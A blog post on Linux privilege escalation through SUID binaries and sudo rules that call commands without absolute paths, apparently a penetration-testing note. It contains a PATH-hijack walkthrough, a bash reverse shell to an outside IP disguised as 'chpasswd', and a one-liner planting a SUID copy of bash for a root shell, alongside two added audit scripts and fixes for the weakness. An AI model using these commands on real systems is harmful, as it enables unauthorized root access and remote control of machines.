SUID,SUDO binary hijack

Find the SUID files:

find / -perm -4000 2>/dev/null

If a binary is in the GTFOBins list (https://gtfobins.github.io/), run the command GTFOBins gives for it. If it is not in the list, use the following ways.

Sudo command / SUID binary without command path

sudo:
If sudo permission is given for a single command without specifying its path, e.g. "hacker10 ALL= (root) less", you can exploit it by changing the PATH variable:

export PATH=/tmp:$PATH
# Put your backdoor in /tmp and name it "less"
sudo less
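Two conditions make that trick work: the sudoers rule names the command without an absolute path, and no "Defaults secure_path" is set (when it is set, sudo replaces the caller's PATH for the command and the export above has no effect). The script below is an added example, not code from the original post or from HackTricks; it audits a sudoers-format file for both conditions. The function names are my own and the sudoers content it writes is constructed; run it against a copy of the real file as root.

```bash
#!/bin/bash
# Added audit example, not code from the original post or HackTricks. Function
# names are my own; the sudoers content written by write_sample_sudoers is
# constructed. Run against a copy of /etc/sudoers (readable only by root).

# Print every user specification whose command list names a command by bare
# name instead of an absolute path. Exit 0 if any were found, 1 otherwise.
find_bare_sudo_commands() {
  awk '
    /^[ \t]*(#|$)/           { next }   # comments and blank lines
    /^[ \t]*Defaults/        { next }   # option lines, checked separately
    /^[ \t]*[A-Za-z]+_Alias/ { next }   # User_Alias, Cmnd_Alias, ... definitions
    {
      eq = index($0, "=")               # user host = (runas) [TAG:] cmd, cmd
      if (eq == 0) next
      rhs = substr($0, eq + 1)
      sub(/^[ \t]*\([^)]*\)[ \t]*/, "", rhs)        # drop the (runas) list
      n = split(rhs, cmds, ",")
      for (i = 1; i <= n; i++) {
        c = cmds[i]
        gsub(/^[ \t]+|[ \t]+$/, "", c)
        sub(/^!+[ \t]*/, "", c)                      # negated command
        while (sub(/^[A-Z]+:[ \t]*/, "", c)) { }     # NOPASSWD:, NOEXEC:, ... tags
        if (c == "" || c == "ALL" || c ~ /^\//) continue
        print; hit = 1; break
      }
    }
    END { exit (hit ? 0 : 1) }
  ' "$1"
}

# sudo carries the caller's PATH into the command unless secure_path is set.
# Exit 0 if an active (uncommented) Defaults line sets it, 1 otherwise.
has_secure_path() {
  grep -Eq '^[[:space:]]*Defaults[^#]*secure_path[[:space:]]*=' "$1"
}

# Summarise one sudoers file: exit 0 if clean, 1 if there is something to fix.
audit_sudoers() {
  local rc=0
  if find_bare_sudo_commands "$1"; then
    echo "  -> command without absolute path: the caller's PATH decides what runs"
    rc=1
  fi
  if ! has_secure_path "$1"; then
    echo "  -> no 'Defaults secure_path': sudo passes the caller's PATH through"
    rc=1
  fi
  return $rc
}

# Constructed samples: "weak" reproduces the post's rule, "fixed" is the same
# grant with an absolute path plus a pinned PATH.
write_sample_sudoers() {    # $1: weak|fixed, $2: output file
  case "$1" in
    weak) cat > "$2" <<'EOF'
Defaults env_reset
hacker10 ALL= (root) less
alice ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx
%admin ALL=(ALL:ALL) ALL
EOF
    ;;
    fixed) cat > "$2" <<'EOF'
Defaults env_reset
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
hacker10 ALL=(root) /usr/bin/less
alice ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx
%admin ALL=(ALL:ALL) ALL
EOF
    ;;
  esac
}

# Usage: sudoers_audit.sh /path/to/sudoers; with no argument the weak sample
# is audited so the output can be seen without root.
if [ $# -ge 1 ]; then
  audit_sudoers "$1"
else
  sample=$(mktemp); write_sample_sudoers weak "$sample"
  audit_sudoers "$sample" || true
  rm -f "$sample"
fi
```

The parser is deliberately simple: it strips the runas list and tags and then asks only whether each command begins with "/". The "fixed" sample shows the two changes that close the hole: the absolute path in the rule and a pinned secure_path.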

suid:
Use strings to inspect the SUID file:

strings reset_pass
...
echo john:john | chpasswd
...

This binary calls chpasswd without specifying its path, so we can inject our own directory into PATH:

export PATH=$(pwd):$PATH

Check the PATH:

echo $PATH
/home/john:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/snap/bin

Then put the reverse shell below into that first directory (/home/john), name it chpasswd, and remember to make it executable (chmod +x).
Reverse shell:

#!/bin/bash
bash -i >& /dev/tcp/192.168.166.195/80 0>&1

Then execute the SUID binary.
Alternatively, we could have it drop a SUID copy of bash:

echo -ne '#!/bin/bash\ncp /bin/bash /dev/shm/bash\nchmod 4775 /dev/shm/bash' > chpasswd
chmod 777 chpasswd

After the SUID binary has run, start the root shell with:

/dev/shm/bash -p
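For the SUID case the root cause sits in the binary itself: it shells out to chpasswd by bare name, so the caller's PATH chooses which file runs as root. The fix on the program side is to call the command with an absolute path (or to set PATH to a fixed value before handing a command line to the shell). The script below is an added example, not code from the original post; it folds the find and strings steps above into an audit that walks a tree for SUID files and reports strings in which a pipeline stage starts with a bare command from a watch list. The helper names and the watch list are my own, a tr-based stand-in replaces strings(1) so the script runs without binutils, and the sample "binaries" it builds are constructed.

```bash
#!/bin/bash
# Added audit example, not code from the original post. Helper names and the
# watch list are my own; the sample "binaries" built below are constructed.

# External commands a SUID program commonly shells out to. A bare occurrence of
# one of these in the binary's strings means the caller's PATH picks the file.
WATCHED_COMMANDS="chpasswd passwd cp chmod chown cat less vi service systemctl mount umount id ls rm tar sh bash"

# Minimal stand-in for strings(1): runs of 4+ printable characters, one per line.
extract_strings() {
  tr -c '[:print:]\n' '\n' < "$1" | grep -E '^.{4,}$' || true
}

# $1: file holding the strings of one binary. Prints every string in which a
# pipeline stage starts with a bare watched command; exit 0 if any, else 1.
flag_bare_commands() {
  awk -v watch="$WATCHED_COMMANDS" '
    BEGIN { n = split(watch, a, " "); for (i = 1; i <= n; i++) known[a[i]] = 1 }
    {
      m = split($0, stages, /[|;&]+/)
      for (i = 1; i <= m; i++) {
        k = split(stages[i], w, /[ \t]+/)
        for (j = 1; j <= k && w[j] == ""; j++) { }    # skip leading blanks
        if (j <= k && (w[j] in known)) { print; hit = 1; break }
      }
    }
    END { exit (hit ? 0 : 1) }
  ' "$1"
}

# Report suspicious strings of the given files as "<path>: <string>".
# Exit 0 if anything was reported, 1 if all files look clean.
audit_files() {
  local f l tmp out rc=1
  tmp=$(mktemp)
  for f in "$@"; do
    extract_strings "$f" > "$tmp"
    if out=$(flag_bare_commands "$tmp"); then
      printf '%s\n' "$out" | while IFS= read -r l; do printf '%s: %s\n' "$f" "$l"; done
      rc=0
    fi
  done
  rm -f "$tmp"
  return $rc
}

# The post's find, fed file by file into audit_files. Walk "/" as root for
# full coverage. Exit 0 if anything was reported, 1 if the tree looks clean.
audit_suid_tree() {
  local root="${1:-/}" list f rc=1
  list=$(mktemp)
  find "$root" -perm -4000 -type f 2>/dev/null > "$list" || true
  while IFS= read -r f; do
    if audit_files "$f"; then rc=0; fi
  done < "$list"
  rm -f "$list"
  return $rc
}

# Constructed sample: a fake SUID "binary" carrying the post's command line,
# beside a hardened twin that names chpasswd by absolute path.
make_sample_tree() {
  local d
  d=$(mktemp -d)
  printf '\177ELF\001\001\001\0\0\0\0\0echo john:john | chpasswd\0done\0' > "$d/reset_pass"
  printf '\177ELF\001\001\001\0\0\0\0\0echo john:john | /usr/sbin/chpasswd\0done\0' > "$d/reset_pass_fixed"
  chmod u+s "$d/reset_pass" "$d/reset_pass_fixed"
  printf '%s\n' "$d"
}

# Usage: suid_audit.sh --demo (constructed sample) or suid_audit.sh /  (as root)
case "${1:-}" in
  --demo) d=$(make_sample_tree); audit_suid_tree "$d" || true; rm -rf "$d" ;;
  "")     ;;                                  # no argument: functions only
  *)      audit_suid_tree "$1" ;;
esac
```

With "--demo" the script reports only reset_pass ("echo john:john | chpasswd") and stays silent on reset_pass_fixed, which is exactly the difference between a binary whose behaviour the caller's PATH can change and one whose behaviour it cannot.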

If I meet a new situation, I will update the article.

Recommended blogs and material:

Hijacking Relative Paths in SUID Programs | by Nairuz Abulhul | R3d Buck3T | Medium

Linux Privilege Escalation | HackTricks | HackTricks

SUID | SGID Part-2 – Linux Privilege Escalation

Source: https://rightevil.github.io/SUID,SUDO-binary-hijack/
Author: rightevil
Published: 12 March 2024